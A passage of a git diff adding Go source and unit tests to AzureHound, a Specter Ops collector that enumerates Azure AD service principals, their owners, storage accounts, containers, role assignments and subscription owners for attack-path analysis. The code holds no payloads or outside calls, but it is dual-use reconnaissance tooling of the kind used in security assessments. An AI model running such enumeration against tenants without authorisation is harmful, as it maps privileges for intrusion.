*cobra.Command, args []string) { + if len(args) > 0 { + exit(fmt.Errorf("unsupported subcommand: %v", args)) + } + + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure objects...") + start := time.Now() + stream := listAll(ctx, azClient) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAll(ctx context.Context, client client.AzureClient) <-chan interface{} { + var ( + azureAD = listAllAD(ctx, client) + azureRM = listAllRM(ctx, client) + ) + return pipeline.Mux(ctx.Done(), azureAD, azureRM) +} diff --git a/cmd/list-service-principal-owners.go b/cmd/list-service-principal-owners.go new file mode 100644 index 0000000..2f209ac --- /dev/null +++ b/cmd/list-service-principal-owners.go @@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listServicePrincipalOwnersCmd) +} + +var listServicePrincipalOwnersCmd = &cobra.Command{ + Use: "service-principal-owners", + Long: "Lists Azure AD Service Principal Owners", + Run: listServicePrincipalOwnersCmdImpl, + SilenceUsage: true, +} + +func listServicePrincipalOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure service principal owners...") + start := time.Now() + stream := listServicePrincipalOwners(ctx, azClient, listServicePrincipals(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listServicePrincipalOwners(ctx context.Context, client client.AzureClient, servicePrincipals <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), servicePrincipals) { + if servicePrincipal, ok := result.(AzureWrapper).Data.(models.ServicePrincipal); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating service principal owners", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, servicePrincipal.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + servicePrincipalOwners = models.ServicePrincipalOwners{ + ServicePrincipalId: id, + } + count = 0 + ) + for item := range client.ListAzureADServicePrincipalOwners(ctx, id, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing owners for this service principal", "servicePrincipalId", id) + } else { + servicePrincipalOwner := models.ServicePrincipalOwner{ + Owner: item.Ok, + ServicePrincipalId: id, + } + log.V(2).Info("found service principal owner", "servicePrincipalOwner", servicePrincipalOwner) + count++ + servicePrincipalOwners.Owners = append(servicePrincipalOwners.Owners, servicePrincipalOwner) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZServicePrincipalOwner, + Data: servicePrincipalOwners, + }); !ok { + return + } + log.V(1).Info("finished listing service principal owners", "servicePrincipalId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all service principal owners") + }() + + return out +} diff --git a/cmd/list-service-principal-owners_test.go b/cmd/list-service-principal-owners_test.go new file mode 100644 index 0000000..61f6eb5 --- /dev/null +++ b/cmd/list-service-principal-owners_test.go @@ -0,0 +1,102 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListServicePrincipalOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockServicePrincipalsChannel := make(chan interface{}) + mockServicePrincipalOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockServicePrincipalOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADServicePrincipalOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockServicePrincipalOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureADServicePrincipalOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockServicePrincipalOwnerChannel2).Times(1) + channel := listServicePrincipalOwners(ctx, mockClient, mockServicePrincipalsChannel) + + go func() { + defer close(mockServicePrincipalsChannel) + mockServicePrincipalsChannel <- AzureWrapper{ + Data: models.ServicePrincipal{}, + } + mockServicePrincipalsChannel <- AzureWrapper{ + Data: models.ServicePrincipal{}, + } + }() + go func() { + defer close(mockServicePrincipalOwnerChannel) + mockServicePrincipalOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockServicePrincipalOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockServicePrincipalOwnerChannel2) + mockServicePrincipalOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockServicePrincipalOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.ServicePrincipalOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ServicePrincipalOwners{}) + } else if len(data.Owners) != 2 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.ServicePrincipalOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ServicePrincipalOwners{}) + } else if len(data.Owners) != 1 { + t.Errorf("got %v, want %v", len(data.Owners), 1) + } +} diff --git a/cmd/list-service-principals.go b/cmd/list-service-principals.go new file mode 100644 index 0000000..5d427af --- /dev/null +++ b/cmd/list-service-principals.go @@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listServicePrincipalsCmd) +} + +var listServicePrincipalsCmd = &cobra.Command{ + Use: "service-principals", + Long: "Lists Azure Active Directory Service Principals", + Run: listServicePrincipalsCmdImpl, + SilenceUsage: true, +} + +func listServicePrincipalsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory service principals...") + start := time.Now() + stream := listServicePrincipals(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listServicePrincipals(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADServicePrincipals(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing service principals") + return + } else { + log.V(2).Info("found service principal", "servicePrincipal", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZServicePrincipal, + Data: models.ServicePrincipal{ + ServicePrincipal: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + }); !ok { + return + } + } + } + log.Info("finished listing all service principals", "count", count) + }() + + return out +} diff --git a/cmd/list-service-principals_test.go b/cmd/list-service-principals_test.go new file mode 100644 index 0000000..b9058fa --- /dev/null +++ b/cmd/list-service-principals_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListServicePrincipals(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.ServicePrincipal]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADServicePrincipals(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.ServicePrincipal]{ + Ok: azure.ServicePrincipal{}, + } + mockChannel <- client.AzureResult[azure.ServicePrincipal]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.ServicePrincipal]{ + Ok: azure.ServicePrincipal{}, + } + }() + + channel := listServicePrincipals(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-storage-account-role-assignments.go b/cmd/list-storage-account-role-assignments.go new file mode 100644 index 0000000..af97baf --- /dev/null +++ b/cmd/list-storage-account-role-assignments.go @@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listStorageAccountRoleAssignment) +} + +var listStorageAccountRoleAssignment = &cobra.Command{ + Use: "storage-account-role-assignments", + Long: "Lists Azure Storage Account Role Assignments", + Run: listStorageAccountRoleAssignmentsImpl, + SilenceUsage: true, +} + +func listStorageAccountRoleAssignmentsImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure storage account role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listStorageAccountRoleAssignments(ctx, azClient, listStorageAccounts(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listStorageAccountRoleAssignments(ctx context.Context, client client.AzureClient, storageAccounts <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), storageAccounts) { + if storageAccount, ok := result.(AzureWrapper).Data.(models.StorageAccount); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating storage account role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, storageAccount.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + storageAccountRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this storage account", "storageAccountId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + storageAccountRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found storage account role assignment", "storageAccountRoleAssignment", storageAccountRoleAssignment) + count++ + storageAccountRoleAssignments.RoleAssignments = append(storageAccountRoleAssignments.RoleAssignments, storageAccountRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZStorageAccountRoleAssignment, + Data: storageAccountRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing storage account role assignments", "storageAccountId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all storage account role assignments") + }() + + return out +} diff --git a/cmd/list-storage-accounts.go b/cmd/list-storage-accounts.go new file mode 100644 index 0000000..541938b --- /dev/null +++ b/cmd/list-storage-accounts.go @@ -0,0 +1,127 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listStorageAccountsCmd) +} + +var listStorageAccountsCmd = &cobra.Command{ + Use: "storage-accounts", + Long: "Lists Azure Storage Accounts", + Run: listStorageAccountsCmdImpl, + SilenceUsage: true, +} + +func listStorageAccountsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure storage accounts...") + start := time.Now() + stream := listStorageAccounts(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listStorageAccounts(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating storage accounts", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureStorageAccounts(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing storage accounts for this subscription", "subscriptionId", id) + } else { + storageAccount := models.StorageAccount{ + StorageAccount: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + ResourceGroupName: item.Ok.ResourceGroupName(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found storage account", "storageAccount", storageAccount) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZStorageAccount, + Data: storageAccount, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing storage accounts", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all storage accounts") + }() + + return out +} diff --git a/cmd/list-storage-containers.go b/cmd/list-storage-containers.go new file mode 100644 index 0000000..8578bf6 --- /dev/null +++ b/cmd/list-storage-containers.go @@ -0,0 +1,135 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listStorageContainersCmd) +} + +var listStorageContainersCmd = &cobra.Command{ + Use: "storage-containers", + Long: "Lists Azure Storage Containers", + Run: listStorageContainersCmdImpl, + SilenceUsage: true, +} + +func listStorageContainersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure storage containers...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + storageAccounts := listStorageAccounts(ctx, azClient, subscriptions) + stream := listStorageContainers(ctx, azClient, storageAccounts) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listStorageContainers(ctx context.Context, client client.AzureClient, storageAccounts <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan interface{}) + // The original size of the demuxxer cascaded into error messages for a lot of collection steps. + // Decreasing the demuxxer size only here is sufficient to prevent the cascade + // The error message with higher values for size is + // "The request was throttled." + // See issue #7: https://github.com/bloodhoundad/azurehound/issues/7 + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), storageAccounts) { + if storageAccount, ok := result.(AzureWrapper).Data.(models.StorageAccount); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating storage containers", "result", result) + return + } else { + if ok := pipeline.SendAny(ctx.Done(), ids, storageAccount); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for stAccount := range stream { + count := 0 + for item := range client.ListAzureStorageContainers(ctx, stAccount.(models.StorageAccount).SubscriptionId, stAccount.(models.StorageAccount).ResourceGroupName, stAccount.(models.StorageAccount).Name, "", "deleted", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing storage containers for this subscription", "subscriptionId", stAccount.(models.StorageAccount).SubscriptionId, "storageAccountName", stAccount.(models.StorageAccount).Name) + } else { + storageContainer := models.StorageContainer{ + StorageContainer: item.Ok, + StorageAccountId: stAccount.(models.StorageAccount).StorageAccount.Id, + SubscriptionId: "/subscriptions/" + stAccount.(models.StorageAccount).SubscriptionId, + ResourceGroupId: item.Ok.ResourceGroupId(), + ResourceGroupName: item.Ok.ResourceGroupName(), + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found storage container", "storageContainer", storageContainer) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZStorageContainer, + Data: storageContainer, + }); !ok { + return + } + } + log.V(1).Info("finished listing storage containers", "subscriptionId", stAccount.(models.StorageAccount).SubscriptionId, "count", count) + } + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all storage containers") + }() + + return out +} diff --git a/cmd/list-subscription-owners.go b/cmd/list-subscription-owners.go new file mode 100644 index 0000000..b351b8e --- /dev/null +++ b/cmd/list-subscription-owners.go @@ -0,0 +1,108 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listSubscriptionOwnersCmd) +} + +var listSubscriptionOwnersCmd = &cobra.Command{ + Use: "subscription-owners", + Long: "Lists Azure Subscription Owners", + Run: listSubscriptionOwnersCmdImpl, + SilenceUsage: true, +} + +func listSubscriptionOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure subscription owners...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + roleAssignments := listSubscriptionRoleAssignments(ctx, azClient, subscriptions) + stream := listSubscriptionOwners(ctx, azClient, roleAssignments) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listSubscriptionOwners(ctx context.Context, client client.AzureClient, roleAssignments <-chan interface{}) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + + for result := range pipeline.OrDone(ctx.Done(), roleAssignments) { + if roleAssignments, ok := result.(AzureWrapper).Data.(models.SubscriptionRoleAssignments); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating subscription owners", "result", result) + return + } else { + var ( + subscriptionOwners = models.SubscriptionOwners{ + SubscriptionId: roleAssignments.SubscriptionId, + } + count = 0 + ) + for _, item := range roleAssignments.RoleAssignments { + roleDefinitionId := path.Base(item.RoleAssignment.Properties.RoleDefinitionId) + + if roleDefinitionId == constants.OwnerRoleID { + subscriptionOwner := models.SubscriptionOwner{ + Owner: item.RoleAssignment, + SubscriptionId: item.SubscriptionId, + } + log.V(2).Info("found subscription owner", "subscriptionOwner", subscriptionOwner) + count++ + subscriptionOwners.Owners = append(subscriptionOwners.Owners, subscriptionOwner) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZSubscriptionOwner, + Data: subscriptionOwners, + }); !ok { + return + } + log.V(1).Info("finished listing subscription owners", "subscriptionId", roleAssignments.SubscriptionId, "count", count) + } + } + }() + + return out +} diff --git a/cmd/list-subscription-owners_test.go b/cmd/list-subscription-owners_test.go new file mode 100644 index 0000000..7850fef --- /dev/null +++ b/cmd/list-subscription-owners_test.go @@ -0,0 +1,78 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListSubscriptionOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan interface{}) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listSubscriptionOwners(ctx, mockClient, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- AzureWrapper{ + Data: models.SubscriptionRoleAssignments{ + SubscriptionId: "foo", + RoleAssignments: []models.SubscriptionRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + }, + }, + }, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.SubscriptionOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionOwners{}) + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-subscription-role-assignments.go 